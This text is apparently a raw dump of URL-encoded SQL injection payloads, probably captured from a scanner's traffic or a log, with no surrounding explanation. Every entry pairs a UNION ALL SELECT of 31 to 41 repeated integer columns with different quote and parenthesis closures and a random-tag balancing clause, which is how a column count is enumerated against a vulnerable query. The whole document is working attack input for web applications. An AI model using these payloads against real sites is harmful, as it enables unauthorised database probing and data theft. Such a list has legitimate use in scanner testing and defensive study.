-4494%27%29%29%20UNION%20ALL%20SELECT%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046--%20%20AND%20%28%28%27XYYw%27%3D%27XYYw -9795%27%29%29%20UNION%20ALL%20SELECT%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513--%20%20AND%20%28%28%27lIhg%27%3D%27lIhg -2273%27%29%29%20UNION%20ALL%20SELECT%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650%2C%205650--%20%20AND%20%28%28%27LBrj%27%3D%27LBrj -8817%27%29%29%20UNION%20ALL%20SELECT%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810--%20%20AND%20%28%28%27YAwr%27%3D%27YAwr -9538%27%29%29%20UNION%20ALL%20SELECT%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438--%20%20AND%20%28%28%27AAXx%27%3D%27AAXx -6179%27%29%29%20UNION%20ALL%20SELECT%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344%2C%202344--%20%20AND%20%28%28%27erAz%27%3D%27erAz -7181%27%29%29%29%20UNION%20ALL%20SELECT%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106%2C%202106--%20%20AND%20%28%28%28%27YXpr%27%3D%27YXpr -8081%27%29%29%29%20UNION%20ALL%20SELECT%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199%2C%201199--%20%20AND%20%28%28%28%27ogHd%27%3D%27ogHd -2674%27%29%29%29%20UNION%20ALL%20SELECT%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485--%20%20AND%20%28%28%28%27Gleu%27%3D%27Gleu -5045%27%29%29%29%20UNION%20ALL%20SELECT%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255%2C%203255--%20%20AND%20%28%28%28%27cfoc%27%3D%27cfoc -1690%27%29%29%29%20UNION%20ALL%20SELECT%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664%2C%205664--%20%20AND%20%28%28%28%27Gtfz%27%3D%27Gtfz -9512%27%29%29%29%20UNION%20ALL%20SELECT%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412%2C%208412--%20%20AND%20%28%28%28%27lwLr%27%3D%27lwLr -6661%27%29%29%29%20UNION%20ALL%20SELECT%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306--%20%20AND%20%28%28%28%27QhiX%27%3D%27QhiX -8251%27%29%29%29%20UNION%20ALL%20SELECT%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934--%20%20AND%20%28%28%28%27aAip%27%3D%27aAip -1141%27%29%29%29%20UNION%20ALL%20SELECT%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001%2C%201001--%20%20AND%20%28%28%28%27fKsN%27%3D%27fKsN -4428%27%29%29%29%20UNION%20ALL%20SELECT%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440--%20%20AND%20%28%28%28%27etzq%27%3D%27etzq -7171%27%20UNION%20ALL%20SELECT%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878%2C%208878--%20%20AND%20%27Zdxw%27%3D%27Zdxw -7416%27%20UNION%20ALL%20SELECT%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334--%20%20AND%20%27CDEi%27%3D%27CDEi -2531%27%20UNION%20ALL%20SELECT%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718%2C%201718--%20%20AND%20%27phNt%27%3D%27phNt -6137%27%20UNION%20ALL%20SELECT%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558%2C%205558--%20%20AND%20%27eLpe%27%3D%27eLpe -8711%27%20UNION%20ALL%20SELECT%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159--%20%20AND%20%27lSSj%27%3D%27lSSj -5950%27%20UNION%20ALL%20SELECT%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394--%20%20AND%20%27yAUW%27%3D%27yAUW -5088%27%20UNION%20ALL%20SELECT%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843--%20%20AND%20%27yljN%27%3D%27yljN -4371%27%20UNION%20ALL%20SELECT%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855--%20%20AND%20%27OLbM%27%3D%27OLbM -9701%27%20UNION%20ALL%20SELECT%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107--%20%20AND%20%27vnqg%27%3D%27vnqg -3796%27%20UNION%20ALL%20SELECT%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016--%20%20AND%20%27oduW%27%3D%27oduW -7925%27%29%20UNION%20ALL%20SELECT%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044--%20%20AND%20%28%27kqjy%27%20LIKE%20%27kqjy -6653%27%29%20UNION%20ALL%20SELECT%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880--%20%20AND%20%28%27UqQo%27%20LIKE%20%27UqQo -7301%27%29%20UNION%20ALL%20SELECT%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741--%20%20AND%20%28%27uJGL%27%20LIKE%20%27uJGL -6258%27%29%20UNION%20ALL%20SELECT%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173--%20%20AND%20%28%27BvGS%27%20LIKE%20%27BvGS -9470%27%29%20UNION%20ALL%20SELECT%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932%2C%205932--%20%20AND%20%28%27yJMc%27%20LIKE%20%27yJMc -7886%27%29%20UNION%20ALL%20SELECT%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062--%20%20AND%20%28%27yPQT%27%20LIKE%20%27yPQT -9325%27%29%20UNION%20ALL%20SELECT%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020--%20%20AND%20%28%27ycHv%27%20LIKE%20%27ycHv -4570%27%29%20UNION%20ALL%20SELECT%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825--%20%20AND%20%28%27EdKS%27%20LIKE%20%27EdKS -6852%27%29%20UNION%20ALL%20SELECT%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258--%20%20AND%20%28%27JqBy%27%20LIKE%20%27JqBy -6872%27%29%20UNION%20ALL%20SELECT%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925--%20%20AND%20%28%27ekRy%27%20LIKE%20%27ekRy -8375%27%29%29%20UNION%20ALL%20SELECT%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907--%20%20AND%20%28%28%27hQbU%27%20LIKE%20%27hQbU -3191%27%29%29%20UNION%20ALL%20SELECT%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921%2C%205921--%20%20AND%20%28%28%27gcKX%27%20LIKE%20%27gcKX -4100%27%29%29%20UNION%20ALL%20SELECT%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152--%20%20AND%20%28%28%27ecZB%27%20LIKE%20%27ecZB -1946%27%29%29%20UNION%20ALL%20SELECT%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701%2C%201701--%20%20AND%20%28%28%27qQJy%27%20LIKE%20%27qQJy -7203%27%29%29%20UNION%20ALL%20SELECT%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083--%20%20AND%20%28%28%27INSd%27%20LIKE%20%27INSd -6939%27%29%29%20UNION%20ALL%20SELECT%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985--%20%20AND%20%28%28%27krwH%27%20LIKE%20%27krwH -7807%27%29%29%20UNION%20ALL%20SELECT%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143--%20%20AND%20%28%28%27BPWr%27%20LIKE%20%27BPWr -1401%27%29%29%20UNION%20ALL%20SELECT%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406%2C%209406--%20%20AND%20%28%28%27EIMO%27%20LIKE%20%27EIMO -1595%27%29%29%20UNION%20ALL%20SELECT%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382%2C%203382--%20%20AND%20%28%28%27vByZ%27%20LIKE%20%27vByZ -2454%27%29%29%20UNION%20ALL%20SELECT%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120%2C%206120--%20%20AND%20%28%28%27glak%27%20LIKE%20%27glak -9864%27%29%29%29%20UNION%20ALL%20SELECT%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741--%20%20AND%20%28%28%28%27wDKw%27%20LIKE%20%27wDKw -2885%27%29%29%29%20UNION%20ALL%20SELECT%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562--%20%20AND%20%28%28%28%27pCqZ%27%20LIKE%20%27pCqZ -3996%27%29%29%29%20UNION%20ALL%20SELECT%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490--%20%20AND%20%28%28%28%27Reza%27%20LIKE%20%27Reza -2112%27%29%29%29%20UNION%20ALL%20SELECT%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254--%20%20AND%20%28%28%28%27IGZp%27%20LIKE%20%27IGZp -9425%27%29%29%29%20UNION%20ALL%20SELECT%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963--%20%20AND%20%28%28%28%27RhSP%27%20LIKE%20%27RhSP -9711%27%29%29%29%20UNION%20ALL%20SELECT%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193%2C%202193--%20%20AND%20%28%28%28%27DyWG%27%20LIKE%20%27DyWG -2164%27%29%29%29%20UNION%20ALL%20SELECT%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846--%20%20AND%20%28%28%28%27YshE%27%20LIKE%20%27YshE -1509%27%29%29%29%20UNION%20ALL%20SELECT%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014%2C%209014--%20%20AND%20%28%28%28%27Xoak%27%20LIKE%20%27Xoak -3473%27%29%29%29%20UNION%20ALL%20SELECT%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750%2C%202750--%20%20AND%20%28%28%28%27phQy%27%20LIKE%20%27phQy 